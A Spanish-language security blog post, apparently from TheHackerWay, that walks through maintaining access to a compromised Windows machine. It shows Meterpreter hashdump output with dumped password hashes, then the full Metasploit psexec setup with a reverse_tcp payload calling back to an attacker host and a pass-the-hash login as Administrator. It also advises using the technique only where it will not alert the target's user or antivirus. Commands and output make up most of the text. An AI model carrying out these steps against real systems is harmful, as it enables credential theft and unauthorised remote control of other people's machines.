INTENTANDO GARANTIZAR Y MANTENER EL ACCESO A UN SISTEMA COMPROMETIDO
Una vez comprometido un sistema y elevados los privilegios de una consola, es conveniente obtener los hash correspondientes a los passwords de los usuarios de dicho sistema (o si es posible la cuenta de administrador), para hacer esto se utiliza extensión priv y posteriormente el comando hashdump de meterpreter
| meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::ASPNET:1004:f398e05bcb3020ceff92d55aff8ce62c:86ceb0fb2a9e29524943fed3ef434477:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::HelpAssistant:1000:4d6764bf7636541b93cef5997b8f8a9d:d266eba66369591255d597bc76155cd8::: Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: postgres:1005:f554be491f92036e46cfff875cbe001d:2b11a19bd88a25d3e2d07cb7cc362044::: SUPPORT_388945a0″:1002:aad3b435b51404eeaad3b435b51404ee:5376b4d52202b447093e4651b63d1572::: |
Como se puede apreciar el comando ha obtenido los hash correspondientes a los usuarios existentes en el sistema.
Nota: En algunos sistemas, esto puede causar la activación del antivirus ya que lo puede considerar maleware alertando de esta forma a algún usuario de la maquina objetivo, así que debe ser usado de forma responsable y solamente en aquellos casos en los cuales no alerte al usuario.
Posteriormente acceder al sistema remoto utilizando el exploit Psexec de la siguiente forma:
| msf exploit(handler) > use exploit/windows/smb/psexec msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST 192.168.1.33 LHOST => 192.168.1.33 msf exploit(psexec) > set LPORT 443 LPORT => 443 msf exploit(psexec) > set RHOST 192.168.1.34 RHOST => 192.168.1.34 msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description —- ————— ——– ———– RHOST 192.168.1.34 yes The target address RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description —- ————— ——– ———– EXITFUNC process yes Exit technique: seh, thread, none, process LHOST 192.168.1.33 yes The listen address LPORT 443 yes The listen port Exploit target: Id Name — —- 0 Automatic |
Con el uso de este exploit y la información obtenida en el proceso de acceso y elevación de privilegios, tenemos suficientes insumos para ejecutar este exploit de una forma exitosa, como puede apreciarse, se debe establecer las opciones correspondientes al usuario y clave que hemos podido obtener anteriormente:
| msf exploit(psexec) > set SMBUser Administrator SMBUser => Administrator msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 SMBPass => aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
msf> exploit |
Por otra parte, para descifrar la clave y conocerla en texto claro, es necesario utilizar herramientas como John the Ripper o OphCrack que se indicarán en próximas entradas.
Otra alternativa interesante en aquellos casos en los que un AV instalado en la maquina comprometida pueda detectar este tipo de acciones es utilizar el script post/windows/gather/hashdump este script de meterpreter retornará únicamente el hash correspondiente al usuario Administrador que es lo que despues de todo, busca un atacante en primera instancia.
| meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key… [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6… [*] Obtaining the user list and keys… [*] Decrypting user keys… [*] Dumping password hashes… Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: |
Seguridad en Sistemas y Técnicas de Hacking. TheHackerWay (THW) 